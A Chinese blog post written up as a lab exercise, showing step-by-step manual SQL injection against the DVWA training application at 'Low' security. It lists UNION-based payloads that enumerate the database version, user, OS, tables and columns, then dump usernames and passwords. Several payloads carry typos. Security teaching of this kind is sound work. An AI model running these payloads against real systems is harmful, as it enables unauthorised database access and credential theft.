DVWA-------简单的SQL注入

已于 2022-04-17 17:35:38 修改
阅读量1w 收藏 58
点赞数 9
文章标签: web sql
于 2022-04-17 17:34:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53139899/article/details/124229137
版权

DVWA-----SQL注入

提示:以下是本篇文章正文内容,下面案例可供参考

一、实验目的

(1)理解SQL注入的原理;
(2)学习手工注入的过程;
(3)掌握SQL注入工具的使用;
(4)掌握SQL注入的防御技术。

二、实验要求

1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终
爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。
2、DVWA安全级别设置为“Low”或者“Medium”,均可。
判断是否存在SQL注入点
DVWA安全级别为’Low‘。

三、实验过程描述

判断是否存在sql注入点
输入id值等于1,发现回显正常在这里插入图片描述输入1 and 1=1,回显正常

在这里插入图片描述
输入1 and 1=2,发现回显仍然是正常的。
在这里插入图片描述
说明不存在数字型漏洞
输入1’,发现回显错误信息,说明该处存在sql注入在这里插入图片描述

观察url处
这里为什么没有显示单引号?因为被url编码了
一般的url编码其实就是那个字符的ASCII值得十六进制,在再前面加个%
一般sql注入中常见的url编码:
空格是%20
单引号是%27
井号是%23
双引号是%22
看到报错我们能看到,这里是由两个单引号括起来的参数。
在这里插入图片描述
我们来输入1’#,把单引号后面的注释掉,发现没有回显错误

在这里插入图片描述
查看源代码
在这里插入图片描述
q u e r y = " S E L E C T f i r s t n a m e , l a s t n a m e F R O M u s e r s W H E R E u s e r i d = ′ query = "SELECT first_name, last_name FROM users WHERE user_id = ' query="SELECTfirstname,lastnameFROMusersWHEREuserid=id’;"
$id = $_REQUEST[ ‘id’ ];

在上述代码中,我们可以看到参数没有进行任何的过滤,我们尝试来闭合单引号
比如我们输入:1’ or ‘1’ =’1
语句就变成了:
$query = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’ or ‘1’ =‘1’;”

下面来利用漏洞获取数据库信息
大概步骤是:
1、猜解所查询的字段数目
2、获取字段显示位
3、通过显示位获取数据库信息
4、获取数据库中的表名
5、获取表中的列名(字段)
6、导出数据库中的数据
7、验证导出数据的有效性

猜解所查询的字段数:
方式1:order by num
如果num数值超过了字段数,则查询会报错,从而判断出来select语句所查询字段的数目:
1’ order by 2 #

在这里插入图片描述
1‘ order by 3 #

在这里插入图片描述
说明该数据表只有两个字段

方式二:
union select 1,2,3…n
如果union select 后的数字位(不一定是1,2,3,只要有数字占位就可以),与实际查询的字段位不完全对应时,查询就会报错,直至调整不报错时的占位个数,从而判断实际查询的字段数
输入:select 1,2#

在这里插入图片描述
在输入:select 1,2,3 #
在这里插入图片描述
证明该数据库的字段只有两个

获取字段的回显位
1’ union select 1,2#
在这里插入图片描述

通过显示位获取数据库信息
获取当前连接的数据库的版本和名称
1’ union select version(),database() #
在这里插入图片描述

获取当前连接数据库的用户:
1‘ union select 1,user() #
在这里插入图片描述

获取服务器的操作系统和存储目录:
1’ union select @@version_compile_os,@@datadir #
在这里插入图片描述
获取数据库中所有的数据库名
在后边 必备知识点中我已解释,这里不在过多阐释。
mysql的数据库information_schema,它是系统数据库,安装完就是有的,它记录当前数据库的数据库,表,列,用户权限等相关信息。
information_schema. schema:记录所有库名信息的表

information_schema.tables:记录所有表名信息的表

information_schema.columns: 记录所有列名信息的表

1’ union select1,schema_name from information_schema.schemata #
在这里权限不够,所以没查出来
在这里插入图片描述
去数据库中进行查询

在这里插入图片描述
这个数据库dvwa正是我们需要的,因此通过此数据库去爆数据表
where后面是限制条件,只查数据库dvwa中的表。
1’ union select 1,table_name from information_schema.tables where table_schema=“dvwa” #
在这里插入图片描述
获取表中的列名(字段)
1’ union select 1, column_name from infomation_schema.columns where table_name=“users” #

在这里插入图片描述
这样看着很乱,这时候就要用group_concat()将这些字段名简单的输出:
1‘ union select 1, group_concat(column_name) from infomation_schema.columns where table_name=“users” #

在这里插入图片描述
关于group_concat(),还有concat()可以自行百度学习
知道了数据库的表名和字段名,就可以爆表了
1’ union select 1,concat(user,’----’,password), from usrs #
在这里插入图片描述
也可以使用另一种方法:
1‘ union select user,password from users #

总结

给大家留一个小问题:
什么是联合查询?在SQL注入时,如何有效地使用联合查询?

为方便实验,在这里写出知识点:
必要知识点:

在mysql5.0以上版本中,mysql存在一个自带的数据库名为information_schema

,它是一个存储记录所有数据库名,表名,列名的数据库,也相当于可以通过它获取指定数据库下面的表名或列名信息。

数据库中符号:.代表下一级,如xiaodi.user表示xiaodi数据库下的user表名

information_schema. schema:记录所有库名信息的表

information_schema.tables:记录所有表名信息的表

information_schema.columns: 记录所有列名信息的表

table_schema:数据库名

table_name:表名

columns_name:列名

信息收集 :

数据库版本:version()

数据库名字:database()

数据库用户:user()

操作系统:@@version_compile_os

数据库的存储目录:@@datadir

笑脸女孩
关注
  • 9
    点赞
  • 58
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
SQL 注入 DVWA 实验
m0_63645854的博客
04-10 1429
SQL注入与自动注入
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 1263
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
DVWA-master.zip
07-31
DVWA,一个集合各种常见漏洞的靶场,文件上传,sql注入,OS命令注入,等等,下载之后直接导入到网站www主目录即可
DVWA——SQL注入
qq_62803993的博客
01-08 2251
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 4302
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
DVWA通过攻略之SQL注入
勿山几已
05-24 5495
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 1万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 4833
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
dvwa——sql注入
GZY0601的博客
09-16 490
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 4383
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWASQL注入漏洞
weixin_56306210的博客
01-30 2196
DVWASQL注入漏洞
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 5072
DVWA-----SQL Injection(SQL手工注入)
DVWASQL注入的步骤
XZZbh的博客
09-18 499
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
Web漏洞分析(dvwaSQL手工注入、sqlmap注入)
王陈锋的博客
11-07 3182
借助Web漏洞教学和演练的开源工具DVWA,学习并了解Web漏洞(以SQL注入为例)的原理及利用,验证SQL注入漏洞的实现过程及结果,并思考应对web漏洞风险的策略与手段。1、操作系统:windows 7/8/10等2、开发环境:DVWA
DVWA-SQL注入
qq_60848021的博客
06-25 1075
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 2432
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
安装并配置SQL注入实验平台DVWA,输入任意SQL注入语句测试
05-18
首先,你需要下载DVWA并安装它。可以通过访问以下链接来下载DVWA:https://github.com/ethicalhack3r/DVWA。 安装过程可能因平台而异,但通常涉及将文件夹解压缩到您的Web服务器的根目录(例如/var/www/html/)。 安装完成后,您需要配置DVWA。为此,请复制config/config.inc.php.dist文件并将其重命名为config.inc.php。然后在config.inc.php中编辑以下行: ``` $_DVWA[ 'db_user' ] = 'your_database_username'; $_DVWA[ 'db_password' ] = 'your_database_password'; $_DVWA[ 'db_database' ] = 'your_database_name'; ``` 将“your_database_username”替换为您的数据库用户名,将“your_database_password”替换为您的数据库密码,将“your_database_name”替换为您的数据库名称。 完成配置后,您可以通过访问您的Web服务器上的DVWA文件夹来访问DVWA。 接下来,您可以使用任意SQL注入语句测试DVWA。例如,您可以通过以下方式尝试注入: 1. 在DVWA登录页面上,输入用户名“admin”和密码“password”。 2. 在“ID”字段中输入以下内容: ``` 1' OR '1'='1 ``` 3. 单击“登录”按钮。 此注入应使您成功登录,因为注入条件始终为真。您可以在登录后尝试其他注入语句,以便进一步测试DVWA的安全性。但请注意,您应该只在您自己的测试环境中进行此类测试,而不是在未经授权的系统上进行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值